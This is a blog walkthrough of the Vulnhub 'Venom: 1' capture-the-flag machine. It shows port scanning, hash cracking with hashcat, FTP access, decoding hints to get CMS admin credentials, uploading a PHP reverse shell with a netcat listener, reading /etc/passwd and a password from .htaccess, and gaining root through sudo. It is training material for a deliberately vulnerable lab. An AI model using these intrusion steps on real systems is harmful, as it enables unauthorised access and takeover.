VENOM: 1 Vulnhub Walkthrough

Subodh Sharma
4 min readJul 31, 2021

--

Today we are going to take OSCP like challenge machine Venom from Vulnhub.This machine requires lots of enumeration to get the foothold. The author name of this machine is Ayush Bawariya & Avnish Kumar and it is venom series machine. You can download this machine in vulnhub box.

Link :- https://download.vulnhub.com/venom/venom.zip

Security Level: Beginners to intermediate

Let’s start with this machine.

Scanning

Let’s start of by scanning the network and identifying the host IP address with netdiscover.

# netdiscover -i vboxnet0

Netdiscover output

We can see our host IP is 192.168.56.13.

Scan open ports with nmap

# nmap -v -T4 -A -p- 192.168.56.13

We found that port 21, 80 and 443 are open & port 22,7070 and 8084 are closed.

Enumeration:

Here, we have some ports open. Firstly, I decided to take a look at the port 80. Although it has the default page apache page. I found an MD5 hash in the page source comment in the last line.

Next, I make a md5.txt file and crack this hash with hashcat.

# hashcat -m 0 -a 0 md5.txt /usr/share/wordlists/rockyou.txt

hashcat output

I have no idea about this password so i go next step to ftp. So, I tried it as the username and password in the FTP server. Luckily, I got access to it

# ftp 192.168.56.13

Connected to 192.168.56.13.
220 (vsFTPd 3.0.3)
Name (192.168.56.13:root): hostinger
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls

ftp> cd files

ftp> get hint.txt

In the ftp server, I got a hint file that I downloaded instantly and exited from the ftp server.

# cat hint.txt

Hey there…

T0D0 —

  • You need to follow the ‘hostinger’ on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
    * some knowledge of cipher is required to decode the dora password..
    * try on venom.box
    password — L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password

Have fun .. :)

Here are some base64 encoded messages that I had to decode one by one. and one more hint to try on venom.box. So i added venom.box in hosts file.

# vim /etc/hosts

192.168.56.13 venom.box

Next decode the base64 encoded messages.

Here we have found some interesting and some link.

According to hint.txt I opened link on the browser https://cryptii.com/pipes/vigenere-cipher and we found some dora credit E7r9t8@Q#h%Hy+M1234

According to hint.txt file we run venom.box in the browser.

Next to find some directory with nikto.

# nikto -h http://venom.box/

According to nikto result we have too many directories and i hit one by one on the browser.In the /panel directories we found a login page.

Usernaem :- dora

Password :- E7r9t8@Q#h%Hy+M1234

Let’s login it.

We have successful login it with administrator. Next to try take reverse shell.

Content > Uploads > Click on uploads file > select files >upload you reverse shell

I have upload a .phar file.

Next run it and start listener on the attacker PC.

# nc -nlvp 443

& call > http://venom.box/uploads/php-reverse-shell.phar

Finally got a reverse shell.

Convert to tty shell

$ which python
/usr/bin/python
$ python -c ‘import pty; pty.spawn(“/bin/bash”)’

Privilege Escalation

$ cat /etc/passwd

nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
hostinger:x:1002:1002:,,,:/home/hostinger:/bin/bash

We have already know the hostinger password is hostinger . Let’s try …

Now we have, Login with hostinger user…

In the /var/www/html/backup file i got .htaccess file

$ cd /var/www/html

$ cd backup

$ ls -lah

$ cat .htaccess

allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

It’s may me another user password so i try this on nathan user..and we login it..

$ su nathan

Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

Root Shell

$ sudo -l

User nathan may run the following commands on venom:
(root) ALL, !/bin/su
(root) ALL, !/bin/su

$ sudo -i

That’s it! Thanks for reading. Happy Hacking )-

--

--

Subodh Sharma
Subodh Sharma

No responses yet